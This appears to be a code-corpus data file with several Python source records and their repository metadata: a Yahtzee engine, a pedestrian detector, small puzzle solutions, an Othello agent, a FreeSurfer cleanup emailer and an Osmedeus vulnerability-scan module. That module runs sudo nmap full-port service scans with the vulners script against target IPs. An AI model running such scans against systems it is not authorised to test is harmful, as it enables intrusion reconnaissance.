ignoreRows = [Scorecard.ROW_NAME.UPPER_TOTAL.value,
Scorecard.ROW_NAME.UPPER_BONUS.value,
Scorecard.ROW_NAME.YAHTZEE_BONUS.value,
Scorecard.ROW_NAME.LOWER_TOTAL.value]
# return any rows with no score, ignoring the "meta rows"
return [rowName for rowName, rowScore in self.iterateOverScorecard()
if rowScore is None and rowName not in ignoreRows]
class Player:
def __init__(self, name, scorecard):
self.name = name
self.scorecard = scorecard
def getName(self): return self.name
def getScorecard(self): return self.scorecard
class Game:
MIN_NUM_DICE = 5
MAX_NUM_DICE = 9
MIN_DICE_FACES = 6
MAX_DICE_FACES = 20
MIN_NUM_ROLLS = 1
MAX_NUM_ROLLS = 5
MIN_PLAYER_NAME_LENGTH = 1
MAX_PLAYER_NAME_LENGTH = 20
class STATUS(Enum):
""" Status of the current game """
NOT_STARTED = 0
RUNNING = 1
FINISHED = 2
def __init__(self, playerNameList, numberOfDice=5, numberOfDiceFaces=6, numberOfRolls=3):
# CHECK: number of dice
if not (Game.MIN_NUM_DICE <= numberOfDice <= Game.MAX_NUM_DICE):
raise ValueError(
"number of dice must be between {} and {}".format(Game.MIN_NUM_DICE, Game.MAX_NUM_DICE))
# CHECK: number of dice faces
if not (Game.MIN_DICE_FACES <= numberOfDiceFaces <= Game.MAX_DICE_FACES):
raise ValueError(
"number of dice faces must be between {} and {}".format(Game.MIN_DICE_FACES, Game.MAX_DICE_FACES))
# CHECK: number of dice rolls
if not (Game.MIN_NUM_ROLLS <= numberOfRolls <= Game.MAX_NUM_ROLLS):
raise ValueError(
"number of dice rolls must be between {} and {}".format(Game.MIN_NUM_ROLLS, Game.MAX_NUM_ROLLS))
# seed random number generator
random.seed()
# game config info
self.numberOfDice = numberOfDice
self.numberOfDiceFaces = numberOfDiceFaces
self.numberOfRolls = numberOfRolls
self.players = []
self.gameStatus = Game.STATUS.NOT_STARTED
# the number of turns in the game
self.turnsPerPlayer = Game.calculateTotalGameTurns(self.numberOfDiceFaces)
self.totalGameTurns = None
# keep track of the current player and their remaining turns
self.currentPlayerIndex = None
self.remainingRolls = self.numberOfRolls
# list of current values of the dice
self.diceValues = [None] * numberOfDice
# list of player-held dice
self.heldDice = [False] * numberOfDice
# add any initial players
for playerName in playerNameList:
self.addPlayer(playerName)
@staticmethod
def calculateTotalGameTurns(numberOfDiceFaces):
""" How many turns will this game have for each player """
return 7 + numberOfDiceFaces
def getAllPlayers(self): return self.players
def getCurrentPlayer(self): return self.players[self.currentPlayerIndex]
def getDiceValues(self): return self.diceValues
def getGameStatus(self): return self.gameStatus
def getNumberOfDice(self): return self.numberOfDice
def getNumberOfDiceFaces(self): return self.numberOfDiceFaces
def getNumberOfPlayers(self): return len(self.players)
def getNumberOfRolls(self): return self.numberOfRolls
def getRemainingRolls(self): return self.remainingRolls
def getHeldDice(self):
""" Return the indices of the held dice """
return [iDice for iDice, isHeld in enumerate(self.heldDice) if isHeld]
def getPlayer(self, name):
""" Return the player with the given name """
for player in self.players:
if player.getName() == name:
return player
return None
def getTotalScores(self):
""" Get the total scores for all players """
return {player.getName(): player.getScorecard().getTotalScore() for player in self.players}
def getScorePossibilities(self):
"""
# Based on the current values of the dice, what are the score possibilities
# for each of the free scorecard rows
"""
return self.getCurrentPlayer().getScorecard().getScorePossibilities(self.getDiceValues())
def setDiceHold(self, diceNum, isHeld):
""" Hold or release this die """
# can only hold a die after the first roll
canHold = self.getGameStatus() == Game.STATUS.RUNNING and self.getRemainingRolls() < self.getNumberOfRolls()
self.heldDice[diceNum] = isHeld and canHold
def setStatus(self, status):
""" Set the status of the current game """
if status not in Game.STATUS:
raise ValueError("status {} is not a valid status".format(status))
self.gameStatus = status
def score(self, rowName):
"""
# Apply the appropriate score to the <rowName> row, given the current diceValues
#
# rowName: (str) name of row to score on
#
"""
logger.debug("score: {}".format(rowName))
# get the current player's scorecard
playerScorecard = self.getCurrentPlayer().getScorecard()
# CHECK: row doesn't already have a score
if playerScorecard.getRowScore(rowName) is not None:
#raise SystemError("tried to score on an already scored row")
return
## CHECK: row does already have a score
## -note: can score multiple times in a yahtzee or yahtzee bonus row
#if rowName not in ["Yahtzee", "Yahtzee Bonus"] and playerScorecard.getRowScore(rowName) is not None:
# raise SystemError("tried to score on an already scored row")
# calculate the score for this row
pointsCalc = Scorecard.PointsCalculator(playerScorecard)
scores = pointsCalc.calculate([rowName], self.getDiceValues())
# store the score(s)
# -may be more than one score if there is a yahtzee bonus
for scoreName, scoreValue in scores.items():
playerScorecard.updateScore(scoreName, scoreValue)
def advanceTurn(self):
""" End the turn of the current player and move on to the next """
logger.debug("advanceTurn")
# next player
self.currentPlayerIndex = (self.currentPlayerIndex + 1) % self.getNumberOfPlayers()
# reset turns
self.remainingRolls = self.numberOfRolls
# reset dice
self.diceValues = [None] * self.numberOfDice
self.heldDice = [False] * self.numberOfDice
# decrement the number of game turns and check if the game is over
self.totalGameTurns -= 1
if self.totalGameTurns == 0:
self.setStatus(Game.STATUS.FINISHED)
def rollDice(self):
""" Roll the non-held dice """
# CHECK: there are turns remaining
if self.remainingRolls < 1:
raise SystemError("trying to roll dice when there are no turns left")
# get the indices of the non-held dice
freeDiceIndices = [iDice for iDice, isHeld in enumerate(self.heldDice) if not isHeld]
# roll this number of dice
newRolls = self._rollFreeDice(len(freeDiceIndices))
# assign the new dice rolls to the free dice
for iRoll, diceVal in enumerate(newRolls):
self.diceValues[freeDiceIndices[iRoll]] = diceVal
# update the players possible scorecard
# decrement number of turns left
self.remainingRolls -= 1
def _rollFreeDice(self, numberOfDice):
""" Roll <numberOfDice> dice """
# no dice
if numberOfDice < 1:
return []
# make sure we can roll this many dice
if numberOfDice > self.numberOfDice:
raise SystemError("tried to roll {} dice, but only have {} in the game"
.format(numberOfDice, self.numberOfDice))
# roll the dice
return [random.randint(1, self.numberOfDiceFaces) for _ in range(numberOfDice)]
#return [1 for _ in range(numberOfDice)]
def addPlayer(self, playerName):
""" Add a player called <playerName> to the game """
# CHECK: player name is a string
if not isinstance(playerName, str):
raise TypeError("player name must be a string")
# CHECK: player name is unique
if playerName in [x.name for x in self.players]:
raise ValueError("player name is already taken")
# CHECK: game hasn't started
if self.getGameStatus() != Game.STATUS.NOT_STARTED:
raise SystemError("can't add a player after the game has started")
# create a new player with a blank scorecard
player = Player(playerName, Scorecard(self.numberOfDiceFaces))
self.players.append(player)
# if this is the first player, make it their turn
if self.getNumberOfPlayers() == 1:
self.currentPlayerIndex = 0
# update the total number of game turns
self.totalGameTurns = self.turnsPerPlayer * self.getNumberOfPlayers()
def removePlayer(self, playerName):
""" Remove the player <playerName> from the game """
# CHECK: player name is a string
if not isinstance(playerName, str):
raise TypeError("player name must be a string")
# CHECK: game hasn't started
if self.getGameStatus() != Game.STATUS.NOT_STARTED:
raise SystemError("can't remove a player after the game has started")
# remove the player and decrement the number of total game turns
for player in self.players:
if player.name == playerName:
self.players.remove(player)
self.totalGameTurns = self.turnsPerPlayer * self.getNumberOfPlayers()
return
# player wasn't found
raise ValueError("player {} is not part of this game".format(playerName))
| 5,235 | 23,753 | 142 |
a4b5f46626461c77388301799358a40d1abdf4d8 | 2,832 | py | Python | run.py | waalbukhanajer/Pedestrian-detection | e9e1dc5632b86f0d77549a799b265dce00a038a4 | [
"MIT"
] | 27 | 2019-06-01T10:45:00.000Z | 2020-04-30T20:18:54.000Z | run.py | waalbukhanajer/Pedestrian-detection | e9e1dc5632b86f0d77549a799b265dce00a038a4 | [
"MIT"
] | 3 | 2020-02-17T14:34:26.000Z | 2020-04-05T03:58:37.000Z | run.py | waalbukhanajer/Pedestrian-detection | e9e1dc5632b86f0d77549a799b265dce00a038a4 | [
"MIT"
] | 11 | 2019-07-31T18:44:18.000Z | 2020-05-07T07:35:41.000Z | import cv2
import numpy as np
import time
from skimage.feature import hog
from sklearn.externals import joblib
from nms import nms
import argparse
# made by abhinav sagar on 7/2/2019
parser = argparse.ArgumentParser(description='To read image name')
parser.add_argument('-i', "--image", help="Path to the test image", required=True)
parser.add_argument('-d','--downscale', help="Downscale ratio", default=1.2, type=float)
parser.add_argument('-v', '--visualize', help="Visualize the sliding window", action="store_true")
parser.add_argument('-w', '--winstride', help="Pixels to move in one step, in any direction", default=8, type=int)
parser.add_argument('-n', '--nms_threshold', help="Threshold Values between 0 to 1 for NMS thresholding. Default is 0.2", default=0.2, type=float)
args = vars(parser.parse_args())
clf = joblib.load("pedestrian.pkl")
orig = cv2.imread(args["image"])
img = orig.copy()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
scaleFactor = args["downscale"]
inverse = 1.0/scaleFactor
winStride = (args["winstride"], args["winstride"])
winSize = (128, 64)
rects = []
h, w = gray.shape
count = 0
while (h >= 128 and w >= 64):
print (gray.shape)
h, w= gray.shape
horiz = w - 64
vert = h - 128
print (horiz, vert)
i = 0
j = 0
while i < vert:
j = 0
while j < horiz:
portion = gray[i:i+winSize[0], j:j+winSize[1]]
features = hog(portion, orientations=9, pixels_per_cell=(8, 8), cells_per_block=(2, 2), block_norm="L2")
result = clf.predict([features])
if args["visualize"]:
visual = gray.copy()
cv2.rectangle(visual, (j, i), (j+winSize[1], i+winSize[0]), (0, 0, 255), 2)
cv2.imshow("visual", visual)
cv2.waitKey(1)
if int(result[0]) == 1:
print (result, i, j)
confidence = clf.decision_function([features])
appendRects(i, j, confidence, count, rects)
j = j + winStride[0]
i = i + winStride[1]
gray = cv2.resize(gray, (int(w*inverse), int(h*inverse)), interpolation=cv2.INTER_AREA)
count = count + 1
print (count)
print (rects)
nms_rects = nms(rects, args["nms_threshold"])
for (a, b, conf, c, d) in rects:
cv2.rectangle(orig, (a, b), (a+c, b+d), (0, 255, 0), 2)
cv2.imshow("Before NMS", orig)
cv2.waitKey(0)
for (a, b, conf, c, d) in nms_rects:
cv2.rectangle(img, (a, b), (a+c, b+d), (0, 255, 0), 2)
cv2.imshow("After NMS", img)
cv2.waitKey(0)
# save output
cv2.imwrite("../output.jpg", img)
| 25.745455 | 146 | 0.608757 | import cv2
import numpy as np
import time
from skimage.feature import hog
from sklearn.externals import joblib
from nms import nms
import argparse
# made by abhinav sagar on 7/2/2019
def appendRects(i, j, conf, c, rects):
x = int((j)*pow(scaleFactor, c))
y = int((i)*pow(scaleFactor, c))
w = int((64)*pow(scaleFactor, c))
h = int((128)*pow(scaleFactor, c))
rects.append((x, y, conf, w, h))
parser = argparse.ArgumentParser(description='To read image name')
parser.add_argument('-i', "--image", help="Path to the test image", required=True)
parser.add_argument('-d','--downscale', help="Downscale ratio", default=1.2, type=float)
parser.add_argument('-v', '--visualize', help="Visualize the sliding window", action="store_true")
parser.add_argument('-w', '--winstride', help="Pixels to move in one step, in any direction", default=8, type=int)
parser.add_argument('-n', '--nms_threshold', help="Threshold Values between 0 to 1 for NMS thresholding. Default is 0.2", default=0.2, type=float)
args = vars(parser.parse_args())
clf = joblib.load("pedestrian.pkl")
orig = cv2.imread(args["image"])
img = orig.copy()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
scaleFactor = args["downscale"]
inverse = 1.0/scaleFactor
winStride = (args["winstride"], args["winstride"])
winSize = (128, 64)
rects = []
h, w = gray.shape
count = 0
while (h >= 128 and w >= 64):
print (gray.shape)
h, w= gray.shape
horiz = w - 64
vert = h - 128
print (horiz, vert)
i = 0
j = 0
while i < vert:
j = 0
while j < horiz:
portion = gray[i:i+winSize[0], j:j+winSize[1]]
features = hog(portion, orientations=9, pixels_per_cell=(8, 8), cells_per_block=(2, 2), block_norm="L2")
result = clf.predict([features])
if args["visualize"]:
visual = gray.copy()
cv2.rectangle(visual, (j, i), (j+winSize[1], i+winSize[0]), (0, 0, 255), 2)
cv2.imshow("visual", visual)
cv2.waitKey(1)
if int(result[0]) == 1:
print (result, i, j)
confidence = clf.decision_function([features])
appendRects(i, j, confidence, count, rects)
j = j + winStride[0]
i = i + winStride[1]
gray = cv2.resize(gray, (int(w*inverse), int(h*inverse)), interpolation=cv2.INTER_AREA)
count = count + 1
print (count)
print (rects)
nms_rects = nms(rects, args["nms_threshold"])
for (a, b, conf, c, d) in rects:
cv2.rectangle(orig, (a, b), (a+c, b+d), (0, 255, 0), 2)
cv2.imshow("Before NMS", orig)
cv2.waitKey(0)
for (a, b, conf, c, d) in nms_rects:
cv2.rectangle(img, (a, b), (a+c, b+d), (0, 255, 0), 2)
cv2.imshow("After NMS", img)
cv2.waitKey(0)
# save output
cv2.imwrite("../output.jpg", img)
| 205 | 0 | 23 |
e1a12ad1445005c3a2d057a63d8fd83262e6e645 | 732 | py | Python | day_02/day_02.py | niccolomarcon/AoC_2020 | 1afe7453f7ad8c789a3f804c29159c0bb62a7499 | [
"MIT"
] | null | null | null | day_02/day_02.py | niccolomarcon/AoC_2020 | 1afe7453f7ad8c789a3f804c29159c0bb62a7499 | [
"MIT"
] | null | null | null | day_02/day_02.py | niccolomarcon/AoC_2020 | 1afe7453f7ad8c789a3f804c29159c0bb62a7499 | [
"MIT"
] | null | null | null | from collections import Counter
if __name__ == '__main__':
with open('input.txt') as input_file:
policy_pass_list = [read(line) for line in input_file]
valid_passwords = list(filter(valid, policy_pass_list))
print(len(valid_passwords))
| 26.142857 | 62 | 0.631148 | from collections import Counter
def read(line):
policy, password = line.split(': ')
limits, char = policy.split()
a, b = tuple(map(int, limits.split('-')))
return ((char, a, b), password[:-1])
def old_valid(entry):
(char, mini, maxi), password = entry
pass_counter = Counter(password)
return mini <= pass_counter[char] <= maxi
def valid(entry):
(char, i, j), password = entry
x, y = password[i - 1], password[j - 1]
return int(x == char) + int(y == char) == 1
if __name__ == '__main__':
with open('input.txt') as input_file:
policy_pass_list = [read(line) for line in input_file]
valid_passwords = list(filter(valid, policy_pass_list))
print(len(valid_passwords))
| 402 | 0 | 69 |
32d43f96150582c9c5347fd4550a23c693a423f8 | 2,403 | py | Python | vs_people.py | JeongUkJae/othello-ml-agent-implementation | f0cb61bc042718c76bbf25173032a3c1d19d41a5 | [
"MIT"
] | null | null | null | vs_people.py | JeongUkJae/othello-ml-agent-implementation | f0cb61bc042718c76bbf25173032a3c1d19d41a5 | [
"MIT"
] | null | null | null | vs_people.py | JeongUkJae/othello-ml-agent-implementation | f0cb61bc042718c76bbf25173032a3c1d19d41a5 | [
"MIT"
] | 1 | 2019-08-31T12:13:38.000Z | 2019-08-31T12:13:38.000Z | import sys
import random
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, BatchNormalization
from keras.utils import to_categorical
from othello_ml import Othello, Action
from othello_ml.visualizer import Visualizer
from train import MLAgent, MLRenderer
model = Sequential([
Conv2D(
32,
kernel_size=(3, 3),
input_shape=(8, 8, 1),
padding='same',
activation='relu'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(32, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(2, (1, 1), activation='softmax', padding='same'),
])
model.summary()
model.load_weights("episode_1000.h5")
while True:
othello = Othello()
renderer = MLRenderer(path='./result/test-prob-')
agent1 = MLAgent(
othello, model, random_rate=0, no_reward=True, renderer=renderer)
agent2 = CliAgent(othello)
visualizer = Visualizer(othello, path=f'./result/test-')
othello.play()
| 28.270588 | 77 | 0.595922 | import sys
import random
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, BatchNormalization
from keras.utils import to_categorical
from othello_ml import Othello, Action
from othello_ml.visualizer import Visualizer
from train import MLAgent, MLRenderer
class CliAgent:
def __init__(self, othello):
self.othello = othello
othello.agent_actor(self.act)
def act(self, board, turn, invalid_before):
if invalid_before:
print("정상적인 수를 두시기 바랍니다.")
for row in board:
print(
"|", "|".join(
map(lambda x: 'y' if x is 1 else 'n' if x is -1 else 'O',
row)), "|")
is_pass = 1 if input('패스입니까? yn') == 'y' else 0
try:
x = int(input('x:'))
y = int(input('y:'))
except:
x = y = 0
is_pass = True
print('제대로 된 입력이 아니기 때문에 패스합니다.')
action = Action(x=x, y=y)
return action, is_pass
model = Sequential([
Conv2D(
32,
kernel_size=(3, 3),
input_shape=(8, 8, 1),
padding='same',
activation='relu'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(32, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(2, (1, 1), activation='softmax', padding='same'),
])
model.summary()
model.load_weights("episode_1000.h5")
while True:
othello = Othello()
renderer = MLRenderer(path='./result/test-prob-')
agent1 = MLAgent(
othello, model, random_rate=0, no_reward=True, renderer=renderer)
agent2 = CliAgent(othello)
visualizer = Visualizer(othello, path=f'./result/test-')
othello.play()
| 740 | -6 | 76 |
97612f727ccf4133b5ae131e8c1163a6d4f40bde | 4,098 | py | Python | python/warn_purge.py | OSGConnect/freesurfer_workflow | 304a7bde02bd68b2a55887f4bbe88a967ec7fd6b | [
"Apache-2.0"
] | null | null | null | python/warn_purge.py | OSGConnect/freesurfer_workflow | 304a7bde02bd68b2a55887f4bbe88a967ec7fd6b | [
"Apache-2.0"
] | null | null | null | python/warn_purge.py | OSGConnect/freesurfer_workflow | 304a7bde02bd68b2a55887f4bbe88a967ec7fd6b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2016 University of Chicago
# Licensed under the APL 2.0 license
import argparse
import subprocess
import sys
from email.mime.text import MIMEText
import psycopg2
import fsurfer.helpers
import fsurfer
VERSION = fsurfer.__version__
def email_user(workflow_id, email):
"""
Email user informing them that a workflow will be deleted
:param workflow_id: id for workflow that will be deleted
:param email: email address for user
:return: True on success, False on failure
"""
logger = fsurfer.log.get_logger()
msg = MIMEText('The results from your freesurfer ' +
'workflow {0} '.format(workflow_id) +
'will be deleted in 7 days, please download ' +
'them if you would like to save the results.')
msg['Subject'] = 'Results for FSurf workflow {0} '.format(workflow_id)
msg['Subject'] += 'will be deleted'
sender = 'fsurf@login.osgconnect.net'
dest = email
msg['From'] = sender
msg['To'] = dest
try:
sendmail = subprocess.Popen(['/usr/sbin/sendmail', '-t'], stdin=subprocess.PIPE)
sendmail.communicate(msg.as_string())
logger.info("Emailed {0} about purge for workflow {1}".format(email,
workflow_id))
return True
except subprocess.CalledProcessError as e:
logger.exception("Error emailing {0}: {1}".format(email, e))
return False
def process_results():
"""
Process results from jobs, removing any that are more than 30 days old
:return: exit code (0 for success, non-zero for failure)
"""
fsurfer.log.initialize_logging()
logger = fsurfer.log.get_logger()
parser = argparse.ArgumentParser(description="Process and remove old results")
# version info
parser.add_argument('--version', action='version', version='%(prog)s ' + VERSION)
# Arguments for action
parser.add_argument('--dry-run', dest='dry_run',
action='store_true', default=False,
help='Mock actions instead of carrying them out')
parser.add_argument('--debug', dest='debug',
action='store_true', default=False,
help='Output debug messages')
args = parser.parse_args(sys.argv[1:])
if args.debug:
fsurfer.log.set_debugging()
if args.dry_run:
sys.stdout.write("Doing a dry run, no changes will be made\n")
conn = fsurfer.helpers.get_db_client()
cursor = conn.cursor()
job_query = "SELECT jobs.id, " \
" users.username, " \
" users.email, " \
" jobs.state, " \
" jobs.subject " \
"FROM freesurfer_interface.jobs AS jobs, " \
" freesurfer_interface.users AS users "\
"WHERE (state = 'COMPLETED' OR" \
" state = 'ERROR') AND" \
" (age(job_date) >= '22 days' AND " \
" age(job_date) < '23 days') AND" \
" jobs.username = users.username"
try:
cursor.execute(job_query)
for row in cursor.fetchall():
logger.info("Warning user {0} about workflow {1} purge".format(row[0],
row[1]))
if args.dry_run:
sys.stdout.write("Would email {0}".format(row[2]))
sys.stdout.write("about workflow {0}\n".format(row[0]))
continue
if not email_user(row[0], row[2]):
logger.error("Can't email {0} for job {1}".format(row[2],
row[0]))
continue
conn.commit()
except psycopg2.Error, e:
logger.error("Got pgsql error: {0}".format(e))
return 1
finally:
conn.commit()
conn.close()
return 0
if __name__ == '__main__':
sys.exit(process_results())
| 35.947368 | 88 | 0.552709 | #!/usr/bin/env python
# Copyright 2016 University of Chicago
# Licensed under the APL 2.0 license
import argparse
import subprocess
import sys
from email.mime.text import MIMEText
import psycopg2
import fsurfer.helpers
import fsurfer
VERSION = fsurfer.__version__
def email_user(workflow_id, email):
"""
Email user informing them that a workflow will be deleted
:param workflow_id: id for workflow that will be deleted
:param email: email address for user
:return: True on success, False on failure
"""
logger = fsurfer.log.get_logger()
msg = MIMEText('The results from your freesurfer ' +
'workflow {0} '.format(workflow_id) +
'will be deleted in 7 days, please download ' +
'them if you would like to save the results.')
msg['Subject'] = 'Results for FSurf workflow {0} '.format(workflow_id)
msg['Subject'] += 'will be deleted'
sender = 'fsurf@login.osgconnect.net'
dest = email
msg['From'] = sender
msg['To'] = dest
try:
sendmail = subprocess.Popen(['/usr/sbin/sendmail', '-t'], stdin=subprocess.PIPE)
sendmail.communicate(msg.as_string())
logger.info("Emailed {0} about purge for workflow {1}".format(email,
workflow_id))
return True
except subprocess.CalledProcessError as e:
logger.exception("Error emailing {0}: {1}".format(email, e))
return False
def process_results():
"""
Process results from jobs, removing any that are more than 30 days old
:return: exit code (0 for success, non-zero for failure)
"""
fsurfer.log.initialize_logging()
logger = fsurfer.log.get_logger()
parser = argparse.ArgumentParser(description="Process and remove old results")
# version info
parser.add_argument('--version', action='version', version='%(prog)s ' + VERSION)
# Arguments for action
parser.add_argument('--dry-run', dest='dry_run',
action='store_true', default=False,
help='Mock actions instead of carrying them out')
parser.add_argument('--debug', dest='debug',
action='store_true', default=False,
help='Output debug messages')
args = parser.parse_args(sys.argv[1:])
if args.debug:
fsurfer.log.set_debugging()
if args.dry_run:
sys.stdout.write("Doing a dry run, no changes will be made\n")
conn = fsurfer.helpers.get_db_client()
cursor = conn.cursor()
job_query = "SELECT jobs.id, " \
" users.username, " \
" users.email, " \
" jobs.state, " \
" jobs.subject " \
"FROM freesurfer_interface.jobs AS jobs, " \
" freesurfer_interface.users AS users "\
"WHERE (state = 'COMPLETED' OR" \
" state = 'ERROR') AND" \
" (age(job_date) >= '22 days' AND " \
" age(job_date) < '23 days') AND" \
" jobs.username = users.username"
try:
cursor.execute(job_query)
for row in cursor.fetchall():
logger.info("Warning user {0} about workflow {1} purge".format(row[0],
row[1]))
if args.dry_run:
sys.stdout.write("Would email {0}".format(row[2]))
sys.stdout.write("about workflow {0}\n".format(row[0]))
continue
if not email_user(row[0], row[2]):
logger.error("Can't email {0} for job {1}".format(row[2],
row[0]))
continue
conn.commit()
except psycopg2.Error, e:
logger.error("Got pgsql error: {0}".format(e))
return 1
finally:
conn.commit()
conn.close()
return 0
if __name__ == '__main__':
sys.exit(process_results())
| 0 | 0 | 0 |
4007bd3ce43e3f0e7d51f8a3424b1cbe9263a394 | 3,905 | py | Python | modules/vulnscan.py | vhssunny1/Osmedeus | 014a3e94632fb53979c43550f9e833a5b8409747 | [
"MIT"
] | null | null | null | modules/vulnscan.py | vhssunny1/Osmedeus | 014a3e94632fb53979c43550f9e833a5b8409747 | [
"MIT"
] | null | null | null | modules/vulnscan.py | vhssunny1/Osmedeus | 014a3e94632fb53979c43550f9e833a5b8409747 | [
"MIT"
] | null | null | null | import os, time
from core import execute
from core import slack
from core import utils
class VulnScan(object):
''' Scanning vulnerable service based version '''
# def conclude(self):
# #### Create beautiful HTML report for masscan
# cmd = "xsltproc -o $WORKSPACE/portscan/final-$OUTPUT.html $PLUGINS_PATH/nmap-bootstrap.xsl $WORKSPACE/vulnscan/{0}-nmap"
# cmd = utils.replace_argument(self.options, cmd)
# output_path = utils.replace_argument(
# self.options, '$WORKSPACE/portscan/final-$OUTPUT.html')
# std_path = utils.replace_argument(
# self.options, '')
# execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
| 44.375 | 134 | 0.593086 | import os, time
from core import execute
from core import slack
from core import utils
class VulnScan(object):
''' Scanning vulnerable service based version '''
def __init__(self, options):
utils.print_banner("Vulnerable Scanning")
utils.make_directory(options['WORKSPACE'] + '/vulnscan')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info(
"It's already done. use '-f' options to force rerun the module")
return
self.is_direct = utils.is_direct_mode(options, require_input=True)
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content': 'Done Vulnerable Scanning for {0}'.format(self.options['TARGET'])
})
self.initial()
utils.just_waiting(self.options, self.module_name)
# self.conclude()
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content': 'Done Vulnerable Scanning for {0}'.format(self.options['TARGET'])
})
def initial(self):
self.nmap_vuln()
def nmap_vuln(self):
utils.print_good('Starting Nmap VulnScan')
if self.is_direct:
ip_list = utils.just_read(self.is_direct).splitlines()
ip_list = list(set([ip for ip in ip_list if ip != 'N/A']))
else:
main_json = utils.reading_json(utils.replace_argument(
self.options, '$WORKSPACE/$COMPANY.json'))
main_json['Modules'][self.module_name] = []
if self.options['SPEED'] == 'slow':
ip_list = [x.get("IP")
for x in main_json['Subdomains'] if x.get("IP") is not None] + main_json['IP Space']
elif self.options['SPEED'] == 'quick':
ip_list = [x.get("IP")
for x in main_json['Subdomains'] if x.get("IP") is not None]
ip_list = list(set([ip for ip in ip_list if ip != 'N/A']))
if self.options['DEBUG'] == 'True':
ip_list = list(ip_list)[:5]
# Scan every 5 IP at time Increse if you want
for part in utils.chunks(ip_list, 2):
for ip in part:
cmd = 'sudo nmap -T4 -Pn -n -sSV -p- {0} --script $PLUGINS_PATH/vulners.nse --oA $WORKSPACE/vulnscan/{0}-nmap'.format(
ip.strip())
cmd = utils.replace_argument(self.options, cmd)
output_path = utils.replace_argument(
self.options, '$WORKSPACE/vulnscan/{0}-nmap.nmap'.format(ip.strip()))
std_path = utils.replace_argument(
self.options, '$WORKSPACE/vulnscan/std-{0}-nmap.std'.format(ip.strip()))
execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
# check if previous task done or not every 30 second
while not utils.checking_done(self.options, module=self.module_name):
time.sleep(60)
#just save commands
logfile = utils.replace_argument(self.options, '$WORKSPACE/log.json')
utils.save_all_cmd(self.options, logfile)
# def conclude(self):
# #### Create beautiful HTML report for masscan
# cmd = "xsltproc -o $WORKSPACE/portscan/final-$OUTPUT.html $PLUGINS_PATH/nmap-bootstrap.xsl $WORKSPACE/vulnscan/{0}-nmap"
# cmd = utils.replace_argument(self.options, cmd)
# output_path = utils.replace_argument(
# self.options, '$WORKSPACE/portscan/final-$OUTPUT.html')
# std_path = utils.replace_argument(
# self.options, '')
# execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
| 3,105 | 0 | 80 |
bd89371fe0d3e6dd7b20f2c829074cc008ed4a9c | 2,063 | py | Python | Python/minimum-genetic-mutation.py | xiaohalo/LeetCode | 68211ba081934b21bb1968046b7e3c1459b3da2d | [
"MIT"
] | 9 | 2019-06-30T07:15:18.000Z | 2022-02-10T20:13:40.000Z | Python/minimum-genetic-mutation.py | pnandini/LeetCode | e746c3298be96dec8e160da9378940568ef631b1 | [
"MIT"
] | 1 | 2018-07-10T03:28:43.000Z | 2018-07-10T03:28:43.000Z | Python/minimum-genetic-mutation.py | pnandini/LeetCode | e746c3298be96dec8e160da9378940568ef631b1 | [
"MIT"
] | 9 | 2019-01-16T22:16:49.000Z | 2022-02-06T17:33:41.000Z | # Time: O(n * b), n is the length of gene string, b is size of bank
# Space: O(b)
# A gene string can be represented by an 8-character long string,
# with choices from "A","C","G","T".
# Suppose we need to investigate about a mutation (mutation from "start" to "end"),
# where ONE mutation is defined as ONE single character changed in the gene string.
# For example, "AACCGGTT" -> "AACCGGTA" is 1 mutation.
# Also, there is a given gene "bank", which records all the valid gene mutations.
# A gene must be in the bank to make it a valid gene string.
#
# Now, given 3 things - start, end, bank,
# your task is to determine what is the minimum number of mutations needed to
# mutate from "start" to "end". If there is no such a mutation, return -1.
#
# NOTE: 1. Starting point is assumed to be valid, so it might not be included in the bank.
# 2. If multiple mutations are needed, all mutations during in the sequence must be valid.
#
# For example,
#
# bank: "AACCGGTA"
# start: "AACCGGTT"
# end: "AACCGGTA"
# return: 1
#
# bank: "AACCGGTA", "AACCGCTA", "AAACGGTA"
# start: "AACCGGTT"
# end: "AAACGGTA"
# return: 2
#
# bank: "AAAACCCC", "AAACCCCC", "AACCCCCC"
# start: "AAAAACCC"
# end: "AACCCCCC"
# return: 3
from collections import deque
| 30.791045 | 96 | 0.576345 | # Time: O(n * b), n is the length of gene string, b is size of bank
# Space: O(b)
# A gene string can be represented by an 8-character long string,
# with choices from "A","C","G","T".
# Suppose we need to investigate about a mutation (mutation from "start" to "end"),
# where ONE mutation is defined as ONE single character changed in the gene string.
# For example, "AACCGGTT" -> "AACCGGTA" is 1 mutation.
# Also, there is a given gene "bank", which records all the valid gene mutations.
